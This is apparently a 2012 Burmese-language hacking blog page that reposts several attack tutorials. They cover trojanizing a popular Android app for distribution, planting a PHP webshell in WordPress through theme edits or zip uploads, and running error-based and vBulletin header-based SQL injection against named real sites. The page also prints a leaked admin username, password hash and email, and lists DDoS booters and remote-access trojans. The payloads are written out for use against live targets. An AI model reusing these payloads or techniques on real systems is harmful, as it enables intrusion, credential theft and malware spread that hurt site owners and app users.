Sunday, August 26, 2012

Creating Andriod Trojan in 5 steps


Android Trojan လုပ္ပံုလုပ္နည္းအေၾကာင္းတစ္ေစ့တစ္ေစာင္းေျပာၾကည့္ရေအာင္။ Trojan ဆိုတာကေတာ့ သိတဲ့အတိုင္းပဲ အစဥ္အလာနဲ့ေနလာတာဆိုေတာ့ android os ေပၚလာခ်ိန္မွာသူလဲ တစ္ေခတ္ထေနျပန္ရဲ့။ အဲ့trojan ေတြ ဘယ္လိုဝင္တာဆို တာေတာ့ ကိုယ္ေပးဝင္လို့ ဝင္တာပါပဲ။ ခင္ဗ်ားဖုန္းကို google က ကိစၥအခ်ိဳ့ကို ဖယ္လိုက္လို့ သိပ္မအံၾသပါနဲ့တဲ့။ malicious codeers ေတြက Android အတြက္ Trojan ေတြေရးနုိင္ပါတယ္တဲ့ ။
ကဲထားပါေတာ့ေလ။ဘယ္လိုလုပ္တယ္ဆိုတာေလးပဲေျပာရေအာင္ :D
Technical Director for Security Reponse က Eric Chien က brand-new Trojan တစ္ေကာင္ကို ပရိတ္သတ္ေရွ့မွာရိုးရွင္းေသာနည္းေတြနဲ့ ေရးျပခဲ့ပါတယ္။ စိတ္မပူပါနဲ့ သူ sample app က အဲ့အခန္းထဲ မွာပဲရွိတာပါ။ တနည္းေျပာရင္ ဖ်က္ပစ္လိုက္တယ္ေပါ့။ သူပံုစံအတိုင္းတစ္ျခားေျမာက္မ်ားစြာေသာအေကာင္ေလးေတြပဲ ထြက္လာတာ :D
ကဲ ခု Chien ရဲ့ ရိုးရွင္းတဲ့ငါးခ်က္ကိုေျပာပါ့မယ္။
၁။ free app တစ္ခု download ဆြဲလိုက္ပါ။ လူၾကိဳက္မ်ားတဲ့တစ္ခုဆိုပိုေကာင္းတာေပါ့။
၂။ PC နဲ့ Suit ျဖစ္မယ့္ language compiler တစ္ခုနဲ့ source code ယူ ျပီးရင္ CPU နားလည္တဲ့ assembly language ကိုေျပာင္းလို္က္။ ဒီနည္းလမ္းတစ္လမ္းပဲရွိတယ္ final executable file ကို source code ေျပာင္းဖို့ဆိုတာ။ android app ေတြက Java language နဲ့ေရးထားတာဆိုေတာ့ original source code ကို လြယ္ကူရုိးရွင္းတဲ့ tools ေတြနဲ့ေျပာင္းလို့ရပါတယ္။
၃။ ဒါကေတာ့နဲနဲလက္ဝင္တယ္လို့ေျပာပါတယ္။ သံုးမယ့္ app က user information ေတြကို third party app ေတြ ဆီ ေ၇ာက္ေအာင္ သံုးလုပ္နုိင္မယ့္ app ေတြဆိုပိုေကာင္းမယ္ဗ်ာ။ Chien ကေတာ့ demonstration မွာ Android.Geinimi ကို သံုးသြားပါတယ္။
၄။ Trojan code ထည့္တာကေတာ့ ရိုးရွင္းပါတယ္။ source code ရွိတဲ့ folder ထဲကို ထည့္မယ္ ျပီးရင္ Trojan code ကို တစ္ျခား app ထဲက code ေတြထက္ အရင္ run ေအာင္နဲနဲခ်ိန္းမယ္။ ျပီးရင္ Trojanized app ကို device တစ္ခုလံုး ထိန္းခ်ဳပ္ခြင့္ရေအာင္ permission ေပးမယ္။ ျပီး ရင္ေတာ့ အဲ့ app ကိုနာမည္ခ်ိန္းလိုက္ေပါ့။ “FREE!!!!” လို့ပါရင္ လူတိုင္းၾကိဳက္တယ္မလား။ (ဒါေရးျပီးရင္ ဝယ္ပဲသံုးေတာ့မယ္ app ေတြကို :D )
၅။ အားလံုးျပီးသြားရင္ ေတာ့ modified app ကို compile လုပ္။ မေျပာင္းလဲ ရွိတဲ့ market ေပၚမွာ တင္လိုက္ေတာ့။ ျပီးရင္ ျပီးျပီ။
အခု လို Trojan မ်ိဳးပါတဲ့ app ကို android Market က လက္မခံပါဘူးတဲ့။ လက္မခံလို့စိတ္မညစ္ပါနဲ့ တရုတ္ ျဖစ္ ေအာင္က်င့္ၾကံလိုက္။ China Market မွာသြားတင္လိုက္။ ကံေကာင္းလို့ ကိုယ္ေရးတတ္ရင္ တရုတ္မလွလွေလးေတြရဲ့ Photo ေလးေတြရမွာေနာ္။ အဲ့ရက်င္ အေနာ္ကို မေမ့နဲ့ေနာ္ :D
အကယ္လို့ tut အကုန္သိခ်င္ပါတယ္ဆိုလို့ရွိရင္ The Hacker News က ထုတ္တဲ့ ၂၀၁၁ နိုဝင္ဘာလထုတ္ မဂၢဇင္းတြင္ Demystifying the Android Malware ဆိုေသာေခါင္းစဥ္ျဖင့္ စာမ်က္နွာ ၁၆ မွာပါရွိပါတယ္။ကၽြန္ေတာ္ အဲ့ tutorial လုပ္ျပီးပါက ျမန္မာလို တင္ေပးပါ့မယ္။ စာဖတ္သူအားလံုး ကိုယ္စိတ္နွစ္ျဖာက်န္းမာခ်မ္းသာၾကပါေစ။

post by  Fortran
copy from Ghostarea.net
Read More ->>

..:: How to upload shell via Wordpress ::..[2 methods]



Wordpress ထဲကို ကိုယ္ရထားတဲ႔ username / password နဲ႔ login ၀င္ပါ...Dashboard ကိုေရာက္ပါလိမ္႔မယ္...ဘယ္ဘက္နားက appearance ကိုႏွိပ္ပါ...editor ကိုဆက္ႏွိပ္ပါ...Select theme to edit ဆိုျပီး ဒီလိုမ်ိဳးေလးျမင္ရပါလိမ္႔မယ္...ၾကိဳက္ႏွစ္သက္ရာ theme ကုိထားလိုက္ပါ...ကၽြန္ေတာ္ကေတာ႔ url ေခၚရ လြယ္ကူရွင္းလင္းေအာင္ twentyten ကိုပဲထားလိုက္ပါတယ္...select ကို ႏွိပ္ပါ...ပံုေတာ႔နည္းနည္းေသးတယ္....သည္းခံၾကည္႔ဗ်ာ....


 ျပီးရင္ ညာဘက္ျခမ္းနားက 404.php / sidebar.php / page.php စသည္ျဖင္႔ php ေတြအမ်ားၾကီး ရွိပါတယ္...ၾကိဳက္ႏွစ္သက္ရာ php တစ္ခုကို click လိုက္ပါ...edit box ထဲမွာ က်လာတဲ႔ သူ႔ရဲ႔ source code ကို shell ရဲ႔ source code နဲ႔လဲျပီး update ကို ႏွိပ္လိုက္ပါ...wordpress ကို shell တင္ျခင္း လုပ္ငန္းျပီးဆံုးပါျပီ....

shell url ကိုေခၚပါမယ္...သူ႔ path က ဒီလိုပါ...

www.site.com/wp-content/themes/themename/shellname.php


ကဲ...shell ၀င္သြားပါျပီဗ်ာ...ဒါပါပဲ...ေနာက္နည္းေတြလည္း ရွိေသးတယ္ဗ်...ဒါေပမယ္႔ ဒါကေတာ႔ အေသခ်ာဆံုးနည္းပဲ...


ေနာက္တစ္နည္း....
ဒီနည္းကို တို႔အစ္ကိုၾကီးတုတ္ေကာက္ ျပထားတာပါ...

http://www.site.com/...eme-install.php ဆိုတဲ႔အဲ path ကိုသြားပါ... upload option ေတြ႔ပါလိမ္႔မယ္...ႏွိပ္ျပီးေတာ႔ ေတြ႔တဲ႔ browse ကေန shell တင္ပါမယ္....






ဒီမွာ မွတ္ထားရမွာက shell ကိုဒီအတိုင္း .php အေနနဲ႔ တင္လို႔မရပါဘူး.... .zip နဲ႔တင္မွရပါမယ္...ဒီေတာ႔ ကိုယ္တို႔ shell က ccc.php ဆိုပါစို႔...... .zip နဲ႔ ခ်ံဳ႔လိုက္ပါမယ္..... ccc.zip ေပါ႔.... အဲဒီ ccc.zip ကို upload လုပ္ပါ.... .rar မဟုတ္ဘူးေနာ္... zip ... ေသခ်ာေျပာတယ္ေနာ္... .zip လို႔....

တင္လိုက္တာရသြားရင္ ဒီလိုမ်ိဳးစာျပပါလိမ္႔မယ္....


Unpacking the package
Installing the theme
Theme installed successfully.

ဒါဆို shell ရသြားပါျပီ... 
မ်ားမ်ားမေျပာဘူး....သူ႔ shell path က ဒီလိုမ်ိဳးေလးျဖစ္ပါမယ္...မေမ႔ခ်င္ရင္ က်က္ထား... 

www.site.com/wp-content/themes/ccc/ccc.php

ကၽြန္ေတာ္က 404.zip ကိုတင္လိုက္တယ္....ဒီေတာ႔ ကၽြန္ေတာ္႔ shell path က ဒီလိုျဖစ္သြားတာေပါ႔ဗ်ာ.... 
http://www.divinginsurance.org/wp-content/themes/404/404.php



copy from MHU
Read More ->>

[Tut]Error-Based SQL Injection[/Tut]



Error-Based SQL Injection

Content
1.Introduction
2.About
3.Version စစ္မယ္
4.Database စစ္မယ္
5.Table name ရွာမယ္
6.Column name ရွာမယ္
7.Harvestin Data
8.Conclusion

1.Introduction
ဒီ...Error-based SQL injection အေၾကာင္းကုိဘယ္သူမွစတာမေတြ.ေသးလုိ. ဒီ Thread ေလးကုိဖြင့္ေပးလုိက္ပါတယ္...
မွားတာေတြရွိေနရင္လည္း ၀င္းျပီးေထာက္ျပေဆြေႏြးေပးၾကပါ... Posted Image
အရင္ဆုံး SQL Injection အေၾကာင္းကုိနဲနဲေလေဖာပါရေစ Posted Image

SQL Injection ကုိအေျခခံအားျဖင့္ 4မ်ိဳးခဲြျခားလုိ.ရပါတယ္... တခ်ဳိ.ကလည္းသုံးမ်ဳိးလုိ.ေျပာတယ္ ...
1.Blind Based (Also called Boolean)
2.Union Based (အသုံးမ်ားတယ္)
3.Error Based (အခုေျပာမွာ)
4.Double Query (ေနာက္ေျပာမွာ Posted Image)

နံပါတ္ ၁ ျဖစ္တဲ့ Blind ကေတာ္ေတာ္ပဲခက္ပါတယ္... Guessing Skill နဲ. Experience အမ်ားၾကီးလုိပါတယ္ ...လက္ေရွာင္တာမ်ားတယ္(အေနာ္လည္းတစ္ခါမွ ေအာင္ေအာင္ျမင္္ျမင္မထုိးဘူးေသးဘူး Posted Image)
Havij Free version မွာလည္းသုံးမရဘူး... Pro version ၀ယ္ႏိုင္ရင္ေကာင္းမယ္ (ကုိေဘာ့စ္ကုိပူဆာ ၾကပါ Posted Image)

နံပါတ္ ၂ Union ...ကေတာ့အားလုံးလည္းသိျပီးသား ...နာမည္ၾကီးမင္းသား... တစ္တစ္ခါခါ ... Firewall ခံေနတာကလြဲရင္ အသုံးမ်ားတယ္...

နံပါတ္ ၃ Error Based ...အရမ္းကုိေကာင္းတဲ့ Method ပါ... Union အလုပ္မလုပ္ေတာ့ရင္ သူကကယ္တင္ရွင္ပဲ...

နံပါတ္ ၄ Double Q ...သူက Error ရဲ.အဆက္ Query structure ကနာမည္နဲ.လုိက္ေအာင္ေတာ္ေတာ္ရွည္တယ္... သူ.ကုိသုံးရင္ "Bad Request"ဆုိျပီးျပတက္တယ္... သိပ္ေတာ့ၾကိဳက္ဘူး.....

ဒါေတြကအသုံးမ်ားတဲဟာေတြ ... တစ္ျခားအသုံးနည္းတဲ့ MS တုိ. Oracle တုိ. Header Based တုိ.တစ္ပုံၾကီးရွိေသးတယ္...
ကဲကဲေလေဖာတာရပ္ျပီး ....စၾကမယ္ဗ်ာ....

2.About
Error-Based ရဲ. Definition

A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information

သူ.ကိုဘယ္လုိအေျခအေနေတြမွာသုံးႏိုင္လဲ ....?
သူ.ကုိ Union သုံးေနရင္နဲ. ေအာက္က Error မ်ဳိးတစ္ခုခုေတြ.လာျပီဆုိသုံးႏုိင္ပါတယ္...

1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604

ကုိယ္က Union မသုံးခ်င္ဘူးဆုိလည္းသူ.ကိုတန္းသုံးခ်င္လည္းရတယ္...
Demo အေနနဲ.ဒီ site ကုိသုံးျပပါမယ္...
http://www.elansystems.co.za/product-item.php?product_items_id=11
 
3.Version စစ္မယ္

အရင္ဆုံး Version စစ္ဖုို.သုံးရမယ့္ Query က

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansyste...uct_items_id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry '5.1.63-0+squeeze1:1' for key 'group_key'
 
4.Database စစ္မယ္

DB Name ကုိသိခ်င္ရင္ သုံးရမယ့္ Query က
 
and (select 1 from (select count(*),concat((select(select concat(cast(database() as
 char),0x7e)) from information_schema.tables where table_schema=database() limit 0,
1),floor(rand(0)*2))x from information_schema.tables group by x)a) 
 
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
 
http://www.elansystems.co.za/product-item.php?product_items_id=11 [color=#ffd700]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/color]
 
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry 'elansyst_elan~1' for key 'group_key'
Notepad ေလးဖြင့္ျပီး အသာေလးတုိ.ထားလုိက္ ....
ကဲဘယ္လုိလဲ လြယ္လြယ္ေလးပဲမဟုတ္လား... Posted Image

5.Table name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
သတိ limit Function ကုိသုံထားျပီး Table name ေတြကိုတစ္ခုခ်င္း... 1 တုိးျပီးႏုွိက္ထုတ္ပါမယ္....
limit 0,1 ဆုိတဲ့ေနရာမွာ 1,1 .... 2,1 ....စသျဖင့္ Table name ေတြတစ္ခုခ်င္းၾကည့္ရမွာပါ...

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'dealer_tbl~1' for key 'group_key'
ဆက္ရွာပါ.. ကုိယ္စိတ္၀င္စားတာေတြ.ရင္ရပ္ေပါ့...
ဒီေနရာမွာ Table 'wp_users' ကစိတ္၀င္စားဖုိ. တစ္အားေကာင္းေနျပီ Posted Image
ဒီေတာ့ users ထဲက Columns ေတြကို ႏုွိက္ထုတ္ပါ့မယ္....

6. Column name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ဒီေနရာမွာ ကုိယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit
2.table_name ကုိHexခံမယ္ (http://www.swingnote...s/texttohex.php)
ဒီလုိနဲ. limit ကုိ ၁ စီတုိးျပီး ... Column name ေတြရပါလိမ့္မယ္...


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x77705f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'ID~1' for key 'group_key'

cOlumn Name - user_name , user_password , user-email ကိုစိတ္၀င္စားတယ္ဟုတ္?
ok? .....

7.Harvesting Data
ကုိယ့္စိတ္၀င္စားမယ့္ Column name ေတြလည္းရျပီဆုိရင္ Extract လုပ္ပါေတာ့မယ္...
သုံရမယ္ Query ပုံစံက
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ကိုယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit function (count 1 by 1)
2.Databasename (ေစာေစာကတုိ.ထားတဲ့ name ကုိထည့္)
3.TableName (အခုေရာက္ေနတဲ့ table ေပ့ါ)
4.COLUMNNAME (ကို္ယ့္စိတ္၀င္စားတဲ့ COLUMN ေပါ့)

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_login) as char),0x7e)) from elansyst_elan.wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'elan_admin~1' for key 'group_key'

ေနာက္ဆုံးရမယ္အေျဖကုိ ကိုယ့္ပါသာကုိယ္ပဲဆက္ျပီးလုပ္ၾကည့္ပါေတာ့
Quote
elan_admin,$P$BG5yVgzxllpqcLrfwWR9q2TJ8jo8MR0 , darren@elansystems.co.za

8.Conclusion
ဒီေလာက္ဆုိ လြယ္လြယ္ကူကူပဲသေဘာေပါက္မိလိမ့္မယ္ထင္ပါတယ္... ဒီနည္းကအသုံးလည္း၀င္ျပီးလြယ္လည္းလြယ္ကူပါတယ္...
အားနည္းခ်က္ေတြက
၁.Query ရွည္လုိ.အမွားအယြင္းရွိႏုိင္တယ္...
၂.Union မွာ Firewall နဲ.တုိးျပီးဆုိ WAF bypass လုပ္လုိ.ေကာင္းတယ္.. Error ဆုိစိတ္ညစ္ဖုိ.ေကာင္း (အေနာ္လည္းအခုထိလုပ္တက္ေသးဘူး ..လုပ္တက္တဲ့သူမ်ားေအာက္မွာတစ္ခါတည္းေျပာျပၾကပါ ... )
၃.နည္းနည္းလက္၀င္တယ္....

copy from http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/





 
Read More ->>

[TUT]Vbulletin Forum Hacking with Header-Based SQL injection[TUT]




Injecting Vbulletin Forum
******************
/Content\
****************************
$1.Intro
$2.Tutorial
$3.Conclusion

$1.Intro

Quote
Category : Forum Group Injection
Method : Header-Based SQL injection
Original Exploit :http://www.exploit-i...-sql-injection- vulnerability by D4rkB1t
Software :Vbulletin
Dork :inurl:"search.php?search_type=1"
Vulnerable Version : 4.0.x to 4.1.2


(Ques? ကုိနတ္ဆုိးေရ... အခုေျပာမယ့္ အေၾကာင္းအရာေလးကုိ နဲနဲေလာက္ရွင္းျပပါဦး)
(Ans : ဟုတ္ကဲ့ပါ... ရွင္းပါတယ္.. Vbulletin Forum ေတြကုိ SQL injection ေပါက္တဲ့အေၾကာင္းေလးပါတယ္... ကန္.သတ္ခ်က္ေလးေတြရွိပါတယ္....အေပၚမွာေရထားတဲ့အတုိင္း.... version က 4.0.x ကေန 4.1.2 အတြင္းပဲရမွာ vulnerable ျဖစ္ႏွုန္းက ... နဲနဲနည္းပါတယ္... 50% ၀န္းက်င္ေလာက္ေတာ့ရွိပါတယ္... vbulletin ဆုိေတာ့ Admin login ရွာရတာလြယ္ပါတယ္.... ရလာတဲ့ hash ကုိ ျဖည္ဖုိ.ခက္တာပါ)

MRTV-4 ကေတြ.ဆုံေမးျမန္းတဲ့ စတုိင္ဖမ္းထားတယ္.... Posted Image Posted Image

(Ques? ဟင္..ခင္ဗ်ားဟာကလည္း... version ကလည္းေအာက္ေသး.... ျဖစ္ႏုိ္င္ေျခကလည္းနည္းေသး... hashed ကလည္းေျဖမရေတာ့... ဘာသြားလုပ္ေတာ့မွာတုန္း...)
(Ans: နည္းပညာေလဗ် နည္းပညာ...
နည္းပညာလုိက္စားသူတုိင္းက တစ္ခုခု...အသစ္သိရတုိင္း...ထမင္းေမ့ဟင္းေမ့ေလ့လာတက္ၾကတယ္... ခင္ဗ်ားနည္းပညာကုိမသိခ်င္ဘူးလား..?)


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$2.Tutorial
ေတာ္ပါျပီ... ေလပန္းေနတာရပ္ျပီး... စပါေတာ့မယ္... ဒန္တန္.တန္..... Posted Image
အရင္ဆုံး Live Http headers မရွိသူမ်ား.... အျမန္ဆုံးသြင္းလုိက္ၾကပါ....
goto : broswer >> Alt+T >> A >> Search for addons

ပုံမွန္ဆုိရင္ ... google မွာ dork ထည့္ရွာျပီး... Forum ၀င္ျပီး... ေဖာက္ရမွာပါတယ္... အခုေတာ့ ကြ်န္ေတာ့္ demo ေလးနဲ.ပဲ ...လုပ္ပါေတာ့... Posted Image
demo site:
Quote
www.myanmarengineer.org
ကုိေဘာ့စိက... အၾကားအျမင္ရေနလားမတိဘူး.... :P
Forum rules ကျမန္မာ website မ်ားမလုပ္ပါနဲ.ဆုိေတာ့... အခုဟာက ... ခဏေလးပဲစမ္းၾကည့္မွာပါ... (Rule လြတ္တယ္ေနာ္ :))
password ရလည္းဘာမွလုပ္လုိ.မရပါဘူး ... (သိတဲ့အတုိင္းပဲ.. Vbulletin hash အေၾကာင္းကုိေလ)

အဲဒီ့ေတာ့ vul ျဖစ္တဲ့ေနရာ .... Community ထဲက ... Groups ေနရာမွာပါ....
site ရဲ. ညာဘက္ေထာင့္ဆုံး.... အေပၚနားေလးမွာ ... Advanced Search button ေလးကုိ ႏိွပ္ပါ
ေအာက္ကပုံေလးထဲကုိေရာက္သြားလိမ့္မယ္...


လုပ္ရမယ့္အဆင့္ဆင့္က ... forum မွာ member ၀င္... အုပ္စုထဲကုိသြား...ကုိယ့္ဘာသာ ...အုပ္စုတစ္ခုခုကုိ create လုပ္ ...
ဒါမွမဟုတ္လဲ ... ရွိျပီးသား...တစ္ခုခုကုိ ခဏမွတ္ထားလုိက္ေပါ့...

ဒီအဆင့္ေတြျပီးသြားရင္ ... ေစာေစာက Advanced Search ကုိျပန္သြားပါ ...
ကုိယ္မွတ္ထားတဲ့ Group နာမည္ကုိ search box ထဲထည့္ပါ....

ေစာေစာ Install လုပ္ထားတဲ့ ... Live Http headers add-on ကိုဖြင့္ထားပါ ...
ျပီးရင္ search now ကုိႏိွပ္ပါ...
ေအာက္ကပုံကုိၾကည့္ၾကပါ...







ပုံမွာ highlight လုပ္ထားတဲ့ ... စာသားေလးကုိေတြ.ေအာင္ရွာပါ ...
ျပီးရင္... click လုပ္... ေအာက္က replay button ကုိႏိွပ္....
http://i.imgur.com/lBdsZ.png
အခုလုိ ျမင္ရပါလိမ့္မယ္..












cotent box ထဲက.... စာေတြထဲမွာ ေနာက္ဆုံးက .. Id= ဆုိတာကုိေတြ.တယ္ဟုတ္... အဲဒီ့ မွာ SQL query ေတြပုိ.မွာ...
ေအာက္ကဟာေလးကုိ cp/paste လုပ္ျပီး.... replay button ကုိႏွိပ္ပါ...

&cat[0]=1) union select version#

ဒါဆုိအခုလုိ vesion ျမင္ရမယ္....



ေနာက္ဆုံးအဆင့္ ... usr name ေတြ password ေတြ လုိခ်င္ရင္ေအာက္က query ကုိေစာေစာကအတုိင္းပုိ.လုိက္ေပါ့....

&cat[0]=1 union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,usergroupid) from user where usergroupid=6#
ေအာက္မွာ ၾကည့္ၾကပါ...



ဒီေလာက္ဆုိ... သေဘာေပါက္ေလာက္ပါတယ္... ေနာ္...
အားနည္းခ်က္.... Human Image Verification ... ရိွေနရင္...မရပါ....
ပံုမ်ားမျမင္ရလွ်င္ကလစ္လုပ္ပါ

copy from mhu
Thank to D3vilM4yCry


Read More ->>

Many Kind Of DDOS

 

 

Fg Power DDOSER

This tool is primarily a “hostbooter” and is aimed at giving unscrupulous gamers an advantage by flooding opponents with traffic. HTTP flooding capabilities may be effective at bringing down unprotected websites as well. A Firefox password stealer is also included, which can be very deadly as people re-use passwords all the time.

GB DDoSeR v3

This tool is advertised as a booter and delivers a TCP or UDP stream of characters of the attacker’s choice towards a victim IP/host and port. This simple bot is written in Visual Basic.

Silent-DDoSer

This Visual Basic tool offers attack types “UDP”, “SYN” and “HTTP”. All appear to send a basic user-specified flood string. Silent-DDoSer utilizes triple-DES and RC4 encryption, IPv6 capabilities, and password stealing functions.

Drop-Dead DDoS

This tool is one example of a Runescaper booter. While I am not a gamer, the opportunity to make real-world money through the virtual economies of gaming worlds may have help make such tools popular.

D.NET DDoSeR

Positve’s xDDoSeR

Sniff DDoSer

This one was announced on a forum and appears to be written in .NET. The default operation appears targeted towards Xbox flooding. We can also see some of the typical anti-detection mechanisms at play in the builder screen.


Darth DDoSeR v2

Net-Weave

Net-Weave is one of the many bots that appeared in our malware collection in mid-2011. It is a booter/bot and backdoor written in .NET and features the typical array of malware functionality including download and execute, USB spreading capabilities, TCP connection exhaustion flood, UDP flood, and a crude port 80 flood instantiated with a .NET Socket call.

Malevolent DDoSeR


HypoCrite

Host Booter v5.7

This booter features several flooding attacks including the popular Slowloris attack style. The features are listed as:
UDP (UDP flood), Port (Blocks connections on that port), HTTP (For websites), Slowloris (For websites),
Bandwidth Drain (Put a direct link for a .exe or any other file), Send Command To All / Send Stop To All (Execute or End your command), Ports: 25 / 80 / 445 / 3074 / 27015 (Ports you can choose from, you can use your own), Sockets: [1-250] (How many sockets you will use), Seconds: [1-60] (How many seconds you wish your attack to be enabled for), Minutes: [1-59] (How many minutes you wish your attack to be enabled for), Size (KB) Packet size for UDP, Delay (MS) Time between sending a packet
Connect (MS) Reconnect sockets, Timeout (MS) Connection timeout

Manta d0s v1.0

The author of this tool, Puridee, has also written multiple other tools including the “Good-Bye” DoS tool.


Good Bye v3.0

The Good-Bye tools appear to be simple HTTP flooding tools that have no DDoS or botnet capability.


Good Bye v5.0

 

 

Black Peace Group DDoser

Little additional information was found about this particular tool.

Now we’ll look at a couple of “shell booters” that utilize hijacked web applications to perform flooding attacks. While these have been well documented in the past, shell booters typically leverage a number of compromised web applications where an attacker has typically installed a PHP webshell. Sometimes, these webshells may exist on high bandwidth networks, which can amplify the force of the attack significantly. Private webshells are worth more, and lists of webshells can be purchased. Some generic webshells are x32, greenshell, PsYChOTiiC, shell, mouss, Supershell, venom, atomic, and many others. There are other shells specifically created for ddos, such as ddos.php. A webshell can of course be named anything, but these names are common.

PHPDoS

TWBOOTER

 

Gray Pigeon RAT

This is a screenshot from the Gray Pigeon Remote Access Trojan (RAT). In this screenshot, the attacker appears to have three bots online but has filtered the list to show only bots from Beijing, China. Gray Pigeon is well known for its RAT capabilities but it also has DDoS features as well. There are many DDoS bots using Chinese language sets and operating from within the Chinese IP address space. Some of these have been profiled by Jeff Edwards of Arbor Networks ASERT in the past. A great deal of code sharing takes place among the Chinese DDoS bot families that we have analyzed.

DarkComet RAT aka Fynloski

DarkComet is freeware and easily available to anyone. While it features a variety of flooding types, these are an afterthought compared to its main Remote Access Trojan functions which are significant. The binaries for this threat are often called Fynloski.



MP-DDoser v 1.3

 

Warbot

This is the warbot web based control panel. Commands are ddos.http (seen here), ddos.tcp and ddos.udp.



mmcybersecurityteam မွကို Funny_Z0mb!3 စုေဆာင္းတင္ျပေပးျခင္းျဖစ္ပါသည္။
mmcybersecurityteam မွ ဒီပိုစ့္ကိုတိုက္ရိုက္ကူးယူ ျဖန္႕ေ၀တင္ျပျခင္းျဖစ္ပါသည္..။
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology